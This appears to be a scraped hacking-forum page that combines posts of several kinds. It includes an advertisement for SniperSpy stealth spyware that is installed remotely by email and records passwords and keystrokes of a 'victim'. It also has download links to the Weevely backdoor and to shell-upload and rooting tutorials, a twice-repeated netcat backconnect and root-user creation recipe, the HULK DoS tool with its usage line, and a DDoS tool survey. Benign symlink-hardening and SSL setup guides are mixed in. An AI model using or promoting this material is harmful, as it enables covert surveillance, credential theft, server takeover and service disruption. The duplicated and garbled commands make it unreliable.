0 Remote password hacking software - sniperspy

Are you looking for the Best Remote password hacking software? Do you need to spy on your remote computer without the need for physical access? But wait! Before you go for any remote spy software you should read our shocking reviews!

1. Sniper Spy (Remote Install Supported)

Editors Rating: 8/10

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes

4. Records any Password (Email, Login, Instant Messenger etc.)

5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall

What if i dont have physical acess to victims computer?

 No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.

This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.

The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.

Why would I need SniperSpy?

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can't get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.

This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).

                                Sniperspy No 1 PC Spy software

0 || WEEVELY A TINY BACKDOOR ||

Download link

http://www.mediafire.com/?9ep9s7ieqai2djv
 Pass:- www.hackerzadda.com

0 || PHPMYADMIN FINDER ||

HERE IS THE PERL SCRIPT WHICH WILL HELP YOU TO FIND PHPMYADMIN PAGE

0 || SHELL UPLOADING VIA TAMPER DATA ||

HELLO GUYS I HAVE ALREADY POSTED TUTS ON MANUAL SQL INJECTION AND SQL INJECTION VIA TOOL LIKE SQLMAP...

BUT TODAY ILL SHOW YOU HOW TO UPLOAD SHELL ONCE YOU HAVE THE ADMIN ACCESS :)

HERE IS THE VIDEO TUT

HOPE YOU GUYS FIND IT USEFUL

DOWNLOAD TAMPER DATA ADDON (GOOGLE IT)

http://www.mediafire.com/?704b9na4v6x32mz

PASS: hackerzadda.com

0 || R00TING ||

Hello Guys this is a small r00ting video made by me long time back...

it will give you an idea how server is rooted....

Hope you like it :)

http://www.mediafire.com/?1jikwkgm7f8rwab

0 || Add r00t User ||

[+] Listening on port 1234 netcat

Requirements: Must be IP NAT Lan port 1234 on the previous 

Here is 192.168.1.4

[+] Backconnect on

[+] Execute exploit
. / ex

[+] Adduser command

 useradd-g 0-G root, bin, daemon, sys, adm, disk-o-u-p 123 456 0 r00t

 

[+] Del user
userdel r00t

0 || How to Patch Symlink ||

How to Prevent Symlink Attack

by Shubham Upadhyay

:: 0x01 Introduction ::

What is Symlink?

Symlink, commonly known as Symbolic links. It is used for creating shortcuts in Linux.

Bad Impact of Symlink - Suppose you own a small hosting company with a Linux Box, & 1337 sites are hosted there. If an attacker gains access to any single site on your server, he can easily create a symbolic link to / directory & then putting the document root afterwards it. Now the attacker can easily read sensitive files, that can be the configuration file of your billing system. Since, he has local access, now he can easily connect to the mysql & pwn all your clients, & the whole company.

How Symlink is Created - A basic linux command is used in creating symlink. i.e,

ln -s source_file link_name

:: 0x02 Protecting ::

Patching Symlink-

1. Change the permission of /bin/ln to 400.
2. Locate php.ini by command- “locate php.ini” (without quotes) Edit the main php.ini & disable symlink & proc_open.
3. If you have a shared host, & it is vulnerable to symlink.Then, change the permission of your configuration files to 400.
4. Turn PHP safe_mode ON

0 || Hulk- Http Unbearable Load King ||

0x01 Introduction - This tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them to their knees by exhausting the resource pool, its is meant for research purposes only and any malicious usage of this tool is prohibited.

hulk.py Usage - python hulk.py www.url.com

0 || Add r00t User ||

[+] Listening on port 1234 netcat

Requirements: Must be IP NAT Lan port 1234 on the previous 

Here is 192.168.1.4

[+] Backconnect on

[+] Execute exploit
. / ex

[+] Adduser command

 useradd-g 0-G root, bin, daemon, sys, adm, disk-o-u-p 123 456 0 r00t

 

[+] Del user
userdel r00t

0 || Getting Free SSL certificate & Configuring it ||

What is SSL ?

The Secure Sockets Layer (SSL) is a commonly-used protocol for managing the security of a message transmission on the Internet. SSL has recently been succeeded by Transport Layer Security (TLS), which is based on SSL. SSL uses a program layer located between the Internet's Hypertext Transfer Protocol (HTTP) and Transport Control Protocol (TCP) layers.

Why Use SSL ?
Secure Sockets Layer (SSL) is a message transportation protocol that provides the following

Advantages of SSLAuthenticated:- The origin of all messages is assured.

Reliable:-The message transport uses a message integrity check (using a MAC) that ensures the quality of the data being transmitted.

Private:-Messages between the components are encrypted, after a handshake to define a secret key. This ensures that the contents of the messages cannot be read by a third party. If all of your components are behind a firewall, or some other means of protection, and do not require encryption, privacy can be disabled without comprising the authentication and reliability aspects of SSL.


:: 0x02 Starting to Setup up SSL ::

Things required ssh with root access (For this Tutorial) Apache web server (I’m using apache, slightly different method for others)
An Account at http://www.startssl.com (Sign up for the free one)

Let’s Start,Generating RSA Private key
Install & enable OpenSSL (sudo apt-get install openssl / yum install openssl & then sudo a2enmod ssl
; sudo /etc/init.d/apache2 force-reload)


Then to generate the key, give this command.

# openssl genrsa -des3 -out www.cybershubham.com.key 1024

The key will be generate now, and will be saved as www.cybershubham.com.key.

Generating CSR (Certificate Signing Request)
Using the key generate above, you should generate a certificate request file (csr) using openssl as shown below with following command.

# openssl req -new -key www.cybershubham.com.key -out www.cybershubham.com.csr



The csr will generate now, & will be saved as www.cybershubham.com.csr
:: 0x03 Getting a Valid Signed Certificate ::

Hope you have already registered at StartSSL, & validated your domain name.So let’s go forward,

Select Certificate Purpose

Submit CSR
 
Skip the above screen & move forward, as we have already generated the CSR & Key.

Paste your CSR here & click continue.

Click continue.

Selecting Sub Domain

As for the basic free certificate, we don’t get certificate for all our sub domains. you want ssl for your main website. just put www.

Follow the rest 1-2 steps, they are easy.

Retrieve Chain File

Download the StartCom Root CA (PEM encoded file).

:: 0x04 Configuring Web Server ::

Every web server has different configuration, I’ll tell you how to configure apache.

Step 1- Gather all files- the key file(www.cybershubham.com.key) , The retrieved certificate file (www.cybershubham.com.crt) , the Chain file (CA.pem)

Step 2-
# cd /etc/apache2
# mkdir ssl

Step 3-
Upload all files in the ssl directory with ftp or simply use nano command in ssh.

Step 4-
# cd /etc/apache2
# cd sites-available
# nano default-ssl

Most important part, but quite easy just set the write path to files. like this-


Step 5- Configure ports
# cd /etc/apache2
# nano ports.conf

simply add "listen 443” after listen 80 line. (without quotes)

Step 6- Restarting Apache

# /etc/init.d/apache2 reload
# /etc/init.d/apache2 restart


Now you are done !!! Just open https://www.cybershubham.com to check if it works ;)

Step 7- Make https default
# cd /var/www/cybershubham.com/web/
# nano .htaccess

Paste the following content now -

RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://www.cybershubham.com/$1 [R,L]

Now all users will land on https :),Hope you liked the post.

0 DDOS atack In 2012

2011 has been the year where massive DDOS attacks tooks place and most of them were directed by a group of hacktivists called Anonymous and lulzsec. DDOS attacks have totally moved from layer 4 to layer 7 as in layer 4, A hacker would need thousands of computers to attack a single server, where as in Layer 7 DDOS a hacker can easily take down a server with a single computer provided that if it's vulnerable. For those of you who don't know a DOS attack is a method of exhausting a server's resources and compromising it's availability.

Apache Killer

Apache killer is a DDOS/DOS tool written in Perl which sends HTTP GET REQUESTS with multiple byte ranges, These byte ranges occupy a wide variety of portions in the memory space which when abused causes Apache to malfunction.

It was introduced in almost middle of the year 2011, where half of the internet was left vulnerable. And the DOS attacks towards apache were increased by more than 200%. However a patch was released soon after the tool was introduced in the wild. You can read more about apache killer in the following post Zero day Dos vulnerability in Apache.

SlowLoris

Slowloris was also witnessed in the wild, however the intensity of this tool was pretty less then apache killer. Slowloris abuses handling of HTTP request headers

R-U-Dead-Yet

Where in 2011 Apache killer was seen to attack Apache webservers, A tool named R-U-Dead-Yet was also witnessed in wild exploiting HTTP Post Request in order to attack a IIS server. It implements DOS attack via long field submissions.

LOIC

With Apache killer and other tools getting patched on the server side, it was really difficult for the hacktivists to exploit big targets?, So how did they do so?. They used a famous tool called Low Orbit cannon or LOIC for short is by far one of the most famous DDOS tool even. Anonymous used this tool to exploit take down major targets such as payoneer. 

But what's so amazing about this tool as this tool is nearly unstoppable if it's being used by a massive number of audience to target a single website. It performs a DDOS attack by continuously sending a HTTP request. But what's more important to note about this tool is that in 2011, there were about 381,976 downloads. However this download amount has been already surpassed 2 months before in 2012

Image Credit: Imperva